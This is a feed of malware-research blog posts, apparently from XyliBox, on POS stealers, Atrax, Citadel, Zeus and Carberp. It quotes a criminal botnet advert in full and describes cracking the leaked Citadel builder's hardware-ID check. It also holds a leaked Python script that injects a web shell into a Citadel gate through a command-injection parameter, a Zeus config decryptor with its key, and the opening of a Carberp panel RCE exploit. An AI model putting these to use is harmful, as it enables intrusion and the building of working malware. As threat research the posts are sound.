Quantcast
Channel: XyliBox
Viewing all 128 articles
Browse latest View live

Gameboy hacking

November 8, 2013, 5:46 pm
$
0
0
Not malware related, but i recently played with my gameboy more specifically the electronic inside. And some people on skype told me to make a post so here we go... :)
At first i've just hacked my cartridge by replacing the chip containing the rom by an eprom containing demoscene.
I've do that to do a series of videos and enjoying the GB scene on real hardware.

I've later frontlighted my gameboy:

Then do a cartridge led mod:

And finally hacked the ROM of my games due to a 'challenge'
A french guys know as furrtek have made a homebrew game and sold 80 physical cartridges, the goal was to dump the rom and remove the protections:

I've followed the step of Alex who have do an impressive work about gameboy electronics:
http://www.insidegadgets.com/2011/03/19/gbcartread-arduino-based-gameboy-cart-reader-%E2%80%93-part-1-read-the-rom/

Desoldering the cart adaptater of one of my gameboy (and that was a very long operation....):

Building my new cartridge adapter:

Assembling:

it's work !

GBC shield (to avoid the wire jungle):

Some 'pirate' cartridges i've bought (commentary in french sorry):

Never thought it would be so fun to play with gameboy.
Search

Win32/Spy.POSCardStealer.O and unknown POS Sniffer

December 4, 2013, 7:50 am
$
0
0
Finally some new stuff (hmm, no)
Let's talk about Win32/Spy.POSCardStealer.O identified by ESET.
It's pretty lame but let's see it anyway.

On the first procedure the malware will register a reg key in HKLM with 'HDebugger'

And start to search for track2:

Then he call the C&C (hoqou.su/forum.php):
• dns: 1 ›› ip: 62.173.149.140 - adresse: HOQOU.SU

Do a sleep of 120000 ms (2 minutes):

And redo into the track2 research procedure.
When finaly something is found the malware took the PID of the program, the process name and the mem adress:
Then he send it to the C&C...

POST req example:
%5BPID%201224%20%28MSR.exe%29%5D%0D%0A%20ADDR%20000B2F90%3A%20%224111111111111111%3D13071010000000000666%22%0D%0A%5BEOF%5D%0D%0A

This malware can't receive orders, and don't have a special mechanism.
On another sample, i've found another domain: rolex216.8s.nl/go/go.php
• dns: 1 ›› ip: 41.223.53.155 - adresse: ROLEX216.8S.NL

This malware was downloaded from a downloader who now download another malware who brute force wordpress sites (maybe i will talk about this one soon).

Still with POS Malware a 'new' threat (Detected only with generic signatures) appeared.
https://www.virustotal.com/fr/file/746cb8cf77b0b00f14c424731948d8fc13378978d193d75f944b12c25e98e0e2/analysis/1376958328/
I got this sample since august from a guys who found this on his POS systems.
In 3 months there is still no one who have do an accurate signature.

At first he will create two directories 'System\Hidden' inside %APPDATA%\Microsoft\Windows

Do a directory test to know from where the executable is launched:

Copy the EXE and launch the copy:

A registry key "Svchost-Windows-Redquired" is created for persistence

Enter in a procedure to remove the original file:
/c del C:\DOCUME~1\ADMINI~1\Bureau\svchost.exe >> NUL
And as excepted send a exit code just after...

So what's do the fresh copy inside the 'good' folder ?
Firstly he take the jump due to the directory test.

On the procedure he will compute a string based on GetSystemFileTime, then he start to enumerate process.
He will open them one by one, read the memory and look for track 2 in a subroutine.
Usual stuff.
They search by partern from the second part of tracks 2 '=13''=14''=15' etc..

A file 'Sys.dll' is created:
timestamped with
(encoded)
And wrote:

Do a sleep of 450000 ms (7 1/2 minutes)

if a dump is found the dump is encoded:
And wrote in Sys.dll.

Then they are sent one by one to the C&C:

http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/?update=daily&random=563245325050324532495458495358
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/redirect.php
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/website.php
5.9.96.235
The md5 hash '8edf4bc26f9c526ff846c9068f387dac' is 'zabeat'

Win32/Atrax.A

December 6, 2013, 11:03 am
$
0
0
Atrax is a TOR botnet, you can read about it on the excellent post of Aleksandr.
Someone on kernelmode.info posted recently a fresh sample:
MD5: 44a6a7d4a039f7cc2db6e85601f6d8c1

Fun things also, the coder leaved a message:
"Nice blog post ESET 2013/07/24 Greetz to KernelMode.info"

Atrax advertising:
Programming language: C (No C++!)
OS: Win XP - 8.1 (all x86/x64)
Admin rights required: No
Special: Tor Integration, spawns no process -> x64/x86 Process injection, this is the first public bot which supports windows 8!
File size: ~1,2 MB (because of Tor integration and x64/x86 Code), you can get a free assembler web downloader ~2KB

Why Tor?
The bot communicates only via Tor with your panel. With Tor you can get a really nice anonymous Botnet. It is almost impossible (well, theoretically it is possible, but Silkroad is still online, so don’t worry) to get your server ip and put your server down. You get a Tor onion domain and this domain cannot be blacklisted (lasts “forever”). So to sum up: If you don’t do any configuration mistakes, your botnet will probably last very long.
You need a VPS or a dedicated server to host this tor botnet, because you need to set up a hidden service. Because of tor the botnet is consuming more hardware resources than typical botnets. Probably it is not possible to get a 10 Dollar/year VPS and trying to host over 1k victims.

Setting up hidden service instructions:
- https://www.torproject.org/docs/tor-hidden-service.html.en
- http://kendildonic.wordpress.com/2011/08/03/build-a-tor-hidden-service-onion-web-site-with-a-cheap-vps/
- A little manual to set it up on debian based linux systems is included

The bot consist of a core and various plugins/addons. Each plugin/addon costs some money. Every plugin also communicates over tor.
(If somebody is interested in developing a plugin -> contact me)

Some basic features:
- Autostart, Persistence
- x86/x64 Code, x86/x64 Injection with Heavens Gate technique
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine
- Doesn't use suspicious windows apis like GetProcAddress/GetModuleHandle
- Plugins are saved to disk with AES-128-CBC encryption (random key)
- Communication over tor is already encrypted, so no extra communication encryption
- Every Plugin and the core is watermarked. Leak -> No updates/support. (All updates are free)
- Everything UNICODE

Panel:
- http://www0.xup.in/exec/ximg.php?fid=11907674
- http://www0.xup.in/exec/ximg.php?fid=68935688
- http://www0.xup.in/exec/ximg.php?fid=20127007
- http://pixs.ru/showimage/2ci7png_4898170_9693543.png
- http://pixs.ru/showimage/ekahjpg_4965220_9693535.jpg
- Login Bruteforce protection, panel will be locked after x failed logins (captchas are not secure)
- SQL-Injection proof
- No IonCube

Standard Features:
- Kill
- Update
- Download (over Tor), Execute (Commandline-Parameter allowed)
- Download (over Tor), Execute (Commandline-Parameter allowed) in memory (Your file doesn't need to be FUD)
- Install Plugin
- Installation List (A list with all installed applications)

The Core has only a few functions, but they are already pretty useful. Yes you can e.g. start your own uncrypted Bitcoin Miner with the "Download over Tor, Execute Memory" function.
I will give you a plain bitcoin miner exe or just use the binaries you can find in this board.

A bot addon is integrated in the main EXE, so no extra file.
A bot plugin is not integrated, you will receive extra file(s).

Addon - DDOS:
- Full IPv6 ´+ IPv4 support.
- UDP Flood
- TCP Flood
- TCP Connect Flood (Some idiots call this "SYN-Flood")
- HTTP Slowloris (based on http://ckers.org/slowloris/)
- HTTP RUDY (R-U-Dead-Yet, based on https://code.google.com/p/r-u-dead-yet/)
- HTTP File Download (Good if your target hosts a file >1MB)
- If you need some more methods, contact me.

Addon - Form Grabber:
- Firefox, Internet Explorer x86/x64, Chrome SSL HTTP POST Grabber
- Anti-Hook Engine (Removes hooks from other bots)
- Own Hook Engine (No copy/paste crap)
- Tested with Browser: Internet Explorer v7/v9/v10, Firefox v11/v21/v22/v24, Chrome v27/v30
- Tested with Website: PayPal, Amazon, Bitcoin.de, Mt. Gox, eBay, Googlemail, vBulletin Boards
- SPDY v3 support
- IE 7/8/9/10 (Enhanced) Protected Mode Support
- Grabs only important POST Form Requests.
- Searches automatically for Username/Password/Email and CC (Possible CC will be displayed in panel)
- Screenshot: http://www0.xup.in/exec/ximg.php?fid=24471254

Addon - Socks 5 Reverse Socks:
- You need a 2nd VPS/dedicated Server to keep your main C&C server secure!
- Server is a Java application to achieve complete platform independence -> All OS supported!
- Socks 5 with and without authentication
- Controlled via tasks
- You can run different instances of the proxy sever for different purposes
- Works on all clients because it is a reverse socks (No SSH crap!)
- Panel screenshot: http://www0.xup.in/exec/ximg.php?fid=15537396

Plugin - Stealer:
- Steals all current browser versions.
- Steals: CHROME, FIREFOX, SAFARI, INTERNET EXPLORER, OPERA, FILEZILLA, PIDGIN, JDOWNLOADER v1 + v2, GIGATRIBE, THUNDERBIRD, WINDOWSKEY, FLASHFXP, ICQ, MSN, WINDOWS LIVE, OUTLOOK, PALTALK, STEAM Username Only, TRILLIAN, MINECRAFT, DYNDNS, SMARTFTP, WSFTP, Bitcoin Wallet (Armory, Bitcoin-Qt, Electrum, Multibit)
- If you need something more -> ask me.
- Special: JDownloader v1/v2, Bitcoin Wallet Stealer (whole wallet.dat will be uploaded), IE10 + IE11 support!

Plugin - Coin Mining (Experimental)
- Bitcoin / Litecoin Miner
- Hash Rate displayed in panel
- Based on Ufasoft Miner v0.68 (updated regularly)
- Mining with tasks http://www0.xup.in/exec/ximg.php?fid=60729560

Price:
Core: $250 (Launch price! Read information below)
Addon DDOS: $90
Addon Form Grabber: $300
Addon Reverse Socks: $400
Plugin Stealer: $110
Plugin Coin Mining: $140 (Experimental)

Payment only with Bitcoin. Market price from https://www.bitcoin.de "Current Bitcoin price" - 10%, because of high exchange rate fluctuations!
Bugfix Updates and Support is free of course.
Please keep in mind: This Core Price will be higher soon. This Bot is currently in beta stage, so probably there are still some bugs. Get it now pay less + maybe bugs, wait: pay more and bot is stable

- Builder available?
No, your tor domain will last forever if you don't lose the RSA key.

- Is the bot bin FUD?
No, you need a crypter. This bot should work with all crypters, but .NET Crypters are special. Tell me what .NET crypter you want to use and we will see.
I can give you a free .NET Crypter to get you started!

- The bot is too expensive, noob!
I don't care if you think it is too expensive.

- The filesize sucks, noob!
I don't care.

Alright, let's have a look on the C&C of the sample posted on kernelmode.
estrgnejb7sjly7p.onion >> 46.183.219.xxx
The httpd is not properly configured to run with the IP
So, let's have a look from TOR.

Login:

Statistics:

Plugin statistics:

Spreader statistic:

Bots:

Bot legend:

Bot information:

AtraxStealer plugin logs:

Formgrabber plugin logs:

Formgrabber plugin logs detail:

Plugins:

Tasks:

Create a new task:

Task setting for 'Download & Execute':

Task execution:

Edit a task:

Settings:






Win32/BruteForce.WP

December 20, 2013, 12:44 pm
$
0
0
DrWeb released a news about this malware in August, they know it as 'Trojan.WPCracker.1'
And more recently ~ 1e8cd0f0f1702820c870302520bc0176.

This executable communicate with a C&C at dorblu99.net
Let's have a closer look.

Login:

Main:

Bot info:

Broken wordpress:

Statistics:

Add domains:

Add admin panels:

Add logins:

Add passwords:

Add module for jm(zip):

Add module for wp(zip):

Add shell jm(php):

Cron brute:

Ban list:

Logs:

Domains list (downloaded by the malware to know wich wordpress he should brute force):
36k urls.

Roman of abuse.ch have also wrote an interesting post about this threat.

How the protection of Citadel got cracked

December 31, 2013, 5:28 am
$
0
0
Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server)
If you want to read more about the Backconnect on Citadel, the link that g4m372 shared is cool: http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html

I've searched this file thought downloading a random mirror of the Citadel leaked package in hope to find it inside.
Finally the file wasn't on the leaked archive but was already grabbed by various malware trackers.
MD5: 50A59E805EEB228D44F6C08E4B786D1E
Malwarebytes: Backdoor.Citadel.BkCnct

And since i've downloaded the leaked Citadel package... let's see about the Builder.
It can be interesting to make a post about it.

Citadel.exe: a33fb3c7884050642202e39cd7f177e0
Malwarebytes: Hacktool.Citadel.Builder
"ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated."

This file is packed with UPX:

Same for the Citadel Backconnect Server and the Hardware ID generator.
But when we try to unpack it via UPX we have an exception:

UPX told us that there is something wrong with the file header, aquabox used a lame trick.
With an hexadecimal editor we can clearly see that there is a problem with the DOS Header:

We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory.
e_lfanew is null, so let's fix it at 18h by 0x40
Miracle:

Same tricks for the Hardware ID Calculator and the Citadel Backconnect Server, i will get back on these two files later.
Now that we have a clear code we can know the Time/Date Stamp, view the ressources, but more interesting: see how Citadel is protected

Viewing the strings already give us a good insight:
PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber...

But we don't even really need to waste time trying to know how the generation is made.
Although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2)
At the end, you will be here, this routine will finalise your HID:

From another side, you can also have a look on the Hardware ID Calculator.

I've got a problem with this file, the first layer was a SFX archive:

Malware embedded (stealer):


Conclusion: Don't rush on leaked stuff.

Alright, now that you have extracted/unpacked the good HID Calculator you can open it in olly.
The code is exactly the same as the one you can find on the Citadel Builder, it may help to locate the calculation procedure on the builder although it's really easy to locate it.

That was just a short parentheses, to get back on the builder, after that the generation end you will have multiple occasions to view your HID on the stack like here:
And the crutial part start here.

When the Citadel package of Citab got leaked (see this article for more information) an important file was also released:

The HID of the original machine who was running the builder, so you just have to replace your HID by this one, just like this:

And this is how the protection of Citadel become super weak and can generate working malwares
Now you just have to do a codecave or inject a dll in order to modify it permanently, child game.

The problem that every crackers was facing on leaked Citadel builders is to find the good HID key.
Citadel builders who was previously leaked wasn't leaked with HID key.
e.g: vortex1772_second - 1.3.5.1

And you can't just 'force' the procedure to generate a bot because the Citadel stub is encrypted inside, that why when the package got leaked with the correct HID, a easy way to crack the builder appeared.
Without having the good HID you can still bruteforce it till you break the key but this is much harder and time wasting, this solution would be also a more great achievement and respected in scene release.

To finish, let's get back on the Citadel backconnect server who was requested on kernelmode.info

This script was also leaked with the Citab package:


It's for Windows box, and it's super secure... oh wait..
importurllib
importurllib2

def request(url, params=None, method='GET'):
    if method == 'POST':
        urllib2.urlopen(url, urllib.urlencode(params)).read()
    elif method == 'GET':
        if params == None:
            urllib2.urlopen(url)
        else:
            urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()

def uploadShell(url, filename, payload):
    data = {
        'b' : 'tapz',
        'p1' : 'faggot',
        'p2' : 'hacker | echo "' + payload + '">> ' + filename
    }
    request(url + 'test.php', data)

def shellExists(url):
    returnurllib.urlopen(url).getcode() == 200
   
def cleanLogs(url):
    delete = {
        'delete' : ''
    }
    request(URL + 'control.php', delete, 'POST')

URL      = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD  = '<?php phpinfo(); ?>'

uploadShell(URL, FILENAME, PAYLOAD)
print'[~] Shell created!'
ifnot shellExists(URL + FILENAME):
    print'[-]', FILENAME, 'not found...'
else:
    print'[+] Go to:', URL + FILENAME
cleanLogs(URL)
print'[~] Logs cleaned!'

Brief, happy new year guys :)



Jolly Roger Stealer

January 2, 2014, 11:48 am
$
0
0
Friend Kafeine have already do a post on it, although someone recently sent me a url on my cybercrime tracker.. i give a f%$k
• dns: 1 ›› ip: 178.162.193.24 - adresse: LOADER.ISTMEIN.DE


Bot statistic:
CPU "Arhitecture"

Task:

Search module:

HTTP:

Mail:

Create task:

Task statistic:

I haven't looked at a sample because i don't have it but sound very lame, like Plasma HTTP who grab everything without checking if there is already a double.

Troj/WowSpy-A

January 9, 2014, 4:10 pm
$
0
0
Recently a malware who target World of Warcraft got identified.
This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use a Battle.net Authenticator.
Yes, this is another post about password stealer mawlare...

 There is no option to retain password on the WoW client.

The method used to spread this malware is by fake websites leading to malicious download.
The Trojan is bundled with legit programs such as WowMatrix or Curse Client, used by players to manage their AddOns.



Malicious Wowmatrix installer. (DCDD6986941B2B4E78A558CAB3ACF337)

Fake sites:
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.CURSE.PW
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.WOWMATRIX.PW
• dns: 1 ›› ip: 142.4.105.99 - adress: WWW.WOWMATRIX.PW.PW


Blizzard released a statement due to this new threat:

I don't know how work the dll for the moment (at least a bit)
My debugger got some stability issue when handling wow.exe but i will get back on this, the mechanism seem interesting (and they even use OutputDebugString!).

Network trafic after login in:

C&C (in Chinese):

Compromised accounts:



That all for the moment :)

Decoding Zeus 2.9.6.1 dynamic config

January 11, 2014, 9:18 am
$
0
0
I got a look on the zeus builder who was released by the MMBB guy on exploit.in, finally i'm decided to write something about it, so let's talk about the change in the config encryption.
MD5: 0a05783316e7f765e731aadf5098564f

This version use AES instead of RC4 and can interact with the latest version of Firefox.
Anyway it's nothing more than a basic Zeus v2.

iBank parser on the panel, monitoring of process:
About the panel, the released version require Ioncube loader (nvm, the gate code can be recovered easily)

Now let's view an example of report from modules, keylog+screenshot:


Part of the static config (in plain on generated bot):

Installation process/dynamic config decoding (beware, dubstep):

And a small code because it's easier to understand:
<?php
    function decode($data,$key){
        $td=mcrypt_module_open(MCRYPT_RIJNDAEL_128,'', MCRYPT_MODE_ECB,'');
        $iv=mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
       
        mcrypt_generic_init($td,$key,$iv);
        mcrypt_generic($td,$data);
       
        $data=mdecrypt_generic($td,$data);
       
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);
       
        return$data;
    }
   
    function visualDecrypt(&$data){
        $len=strlen($data);
       
        if($len>0)
            for($i=$len-1;$i>0;$i--)
                $data[$i]=chr(ord($data[$i]) ^ ord($data[$i-1]));
    }
   
    $data   =file_get_contents('config.bin');
    $key    =md5('hasd7h12g1',true);
    $decoded= decode($data,$key);
   
    visualDecrypt($decoded);
   
    $size=strlen($decoded);
   
    header('Content-Type: application/octet-stream;');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: '.$size);
    header('Content-Disposition: attachment; filename=config_decrypted.dll');
    header('Expires: 0');
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
   
    echo($decoded);
   
    exit;
?>

You can find the decoded modules here:
JAVA: 7d7ae6ffbd9f3c7673b339f9b94493e5
BSS: cc98dabebe047c6115a6cd9d13ed3122
KEYLOG: 8ac1c7c019d16ff3b8a9543d46ae5e0e

And if you want to test yourself the WebInject, i usually use this code:
set_url http://requesttests.appspot.com* GP
data_before
</body>
data_end

data_inject
<center><img src="http://temari.fr/webinject.png" alt="Injected!"></center>
data_end

data_after
data_end





/facepalm
Search

Plasma HTTP

February 14, 2014, 2:19 pm
$
0
0
Advert:

Login:

Online bot:

offline bots:

Commands:

Statistics:

Logs:



Yeah take this lame article to second degree, i just talk about Plasma because i've promised to write something today on irc.

I'm not dead but there nothing interesting to review for the moment, only crappy bots
That also one of the reason i haven't talked of JackPos and all the rest.
I have some interesting things but it's too sensitive for the moment and when it's not the reason, it's due to people who request me to don't talk of a subject because they want to cover it 'first' for their company but who finaly write nothing, so i still wait (you know who you are)
e.g: ZeusVM, i wanted to talk about the weird version who appeared since some months now
a version who download from sites (on ssl and fastflux) a picture with a config embedded inside.. but well, fuck it now.
As i already told on a previous article, i may appear inactive but i'm not so inactive.
I've recently do this, i still continue to posts malwares, break things but without necessarily talking about it or just briefly like for jackTrash, and today: PlasmaTrash, and iTrashing.
I still continue to do trashy video, show trashy things on my hackerspace and talk about trashs on irc. (yeah that a lot of trash)
So for the moment, i just wait and see...

Zeus 1.1.3.4

March 4, 2014, 10:30 am
$
0
0
RSA FirstWatch throw me recently a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made but seem it's nothing more than just a standard Zeus v2.
But wait, it communicates over SSL and had a new kind of HTTP request pattern:

Fiddler:

Config download in python:
importurllib2

request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')
request.add_header('X_OS', '510')
request.add_header('X_BV', '1.1.3.4')
request.add_header('Control', 'no-cache')
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
open('ajax', 'w').write(page)

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The answer of the server have X_ID as cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, here again nothing new, regular Zeus v2.
Once unpacked, we can see that the malware is targeting German banks and Trusteer:
http*://*netbanking.sparkasse.at/hilfe/sicherheit*
https://*banking.berliner-bank.de/trxm*
https://*banking.co.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://banking.postbank.de/rai*
https://banking.sparda.de*
https://finanzportal.fiducia.de*
https://netbanking.sparkasse.at/*
https://netbanking.sparkasse.at/casserver/login*
https://netbanking.sparkasse.at/sPortal/*
https://online-*.unicredit.it/*
https://online.bankaustria.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://www.trusteer.com/ProtectYourMoney*
WebInjects:
https://secure730.com/oz1/service.in?id=50
https://secure730.com/oz1/service.in?id=44
https://secure730.com/oz1/service.in?id=43
https://secure730.com/oz1/service.in?id=41
https://secure730.com/oz1/service.in?id=7
https://secure730.com/oz1/service.in?id=6
https://secure730.com/oz1/service.in?id=4
https://secure730.com/oz1/service.in?id=3
https://secure730.com/oz1/service.in?id=2
https://secure730.com/oz1/service.in?id=1
https://secureinformat.com/id/351
https://secureinformat.com/id/350
https://secureinformat.com/id/51
https://secureinformat.com/id/10

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky, Perkel is an android malware who was sold by Perkele (this guy was later banned from underground forums for scaming but it's another story)

Sort of Fake AV:

Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)
WebInjects:
https://pikachujp.com/oz1/service.in?id=50
https://pikachujp.com/oz1/service.in?id=44
https://pikachujp.com/oz1/service.in?id=43
https://pikachujp.com/oz1/service.in?id=41
https://pikachujp.com/oz1/service.in?id=7
https://pikachujp.com/oz1/service.in?id=6
https://pikachujp.com/oz1/service.in?id=4
https://pikachujp.com/oz1/service.in?id=3
https://pikachujp.com/oz1/service.in?id=2
https://pikachujp.com/oz1/service.in?id=1
https://koloboktv.com/id/351
https://koloboktv.com/id/350
https://koloboktv.com/id/51
https://koloboktv.com/id/10

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
RC4: 30 72 E6 32 80 EF BD 92 BE DD 3B 1C 58 45 33 2F 41 53 A9 26 8E 20 4D 8A DB 6A F6 8B CE 4C B6 38 02 2B 6C 15 A1 2C 2D C2 ED 0E BB BF 64 40 F1 9F D2 36 07 C3 CF 8D AA D3 A5 42 C0 9B 48 49 67 81 98 75 51 1B 96 6E 97 4A 59 DE 44 65 85 7B 35 16 0C 23 4F FE 5B FA D7 84 A7 46 EE 82 DF E1 6B AD 94 CB 18 C4 8C 0F E7 00 E0 7E CA 24 1A 7A A6 73 3C 03 F5 9C EA 1E FB D4 0B 14 11 22 06 F4 6D 55 E5 93 F9 E2 69 D5 CD 27 E8 12 C8 77 0D 08 A2 B7 0A 01 D8 EB 3F AB 3A 61 83 04 86 CC FD F3 5F 63 09 AC AF 66 17 B9 56 19 F2 C7 47 43 25 1D 89 29 99 2E C1 87 54 C9 62 34 74 4B A0 B1 3E 21 57 52 2A 39 FF 05 BC C6 A4 4E 3D 9D E3 D9 BA 76 5C AE A3 FC B4 B3 D6 28 5A 68 F7 31 7D 7F E4 1F 37 D1 90 B5 B0 D0 C5 79 DA 13 71 A8 7C EC F8 E9 60 50 88 78 70 10 B2 5E 8F 6F 9A B8 95 DC 9E 91 F0 5D
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM

I've wrote a small yara rule in hope to see more of these.
All configs that i grabbed was reporting to localhost not to a server...





Carberp C&C

June 27, 2013, 3:49 am
$
0
0
And here we go, first Carberp panel i break from the leak, surely a test one, gateway was badly configured like domains.

Login:
To view the login page sometime you need a special key like:
/login/?x=11111111111111111111111111111111

It was not required on this server but if you want an example let's try on another Carberp C&C.
Without:
 With:

Dashboard, License Information:

Statistics:

Bots:

Diagram:

Search:

P2P:

Host:

Tasks:

Add a task:

Links:

Logs:

Filters:

Cab-files:

iBank:

Keylogger:

Add program:

Recycle bin:

AutoSystem:

Add domains:

Builds:

Add builds:

Settings:

Users:

User settings:

User permissions:

Edit user:

User information:

About my previous post, fun fact: in 2011 i've already found traces of logs in a C&C, and mystic compressor was used on the sample.
(14:44:15) Павел: надо в админку добавить
1. смотреть все логи по одному боту!
(14:44:27) Павел: показать всех ботовс RU онлайн чисто! логи по ним
(14:44:30) Павел: чтоб глядеть есть ли баги и тд
(14:45:40) aksoft@188.72.206.204/work: оказать всех ботовс RU онлайн чисто! логи по ним - это уточни
(14:45:57) Павел: ну вот чтобы вывод фильтровало
(14:46:14) Павел: нашло всех ботов у которых такая строка в логах есть:
isOfflineVersion = false isOnlineVersion = true
(14:46:18) Павел: language = RUS
(14:46:30) Павел: и после этого логи по ним всем чисто показала! лог вывела
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=747

Carberp Remote Code Execution: Carpwned

June 28, 2013, 10:45 am
$
0
0
Everyone are looking at the Carberp source, bootkit and other components but did people investigated the panels source ?
I don't know who did the PHP but he deserve a medal, it's more easy to hack than SpyEye. (yeah i didn't think it was possible too)

Here i will talk about a simple code injection but there is a lot of others vulnerabilities in theses leaked panels.
e.g: stupid code allow IP spoofing:

No but seriously the best vulnerability is the RCE one, the guys who coded this is really mentally retarded:
look at this eval() look !

Oh good timing, some Carberp C&C appeared on vx.vault:

Let's write a spl0it now, i think most of you come here for a PoC right ?
Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
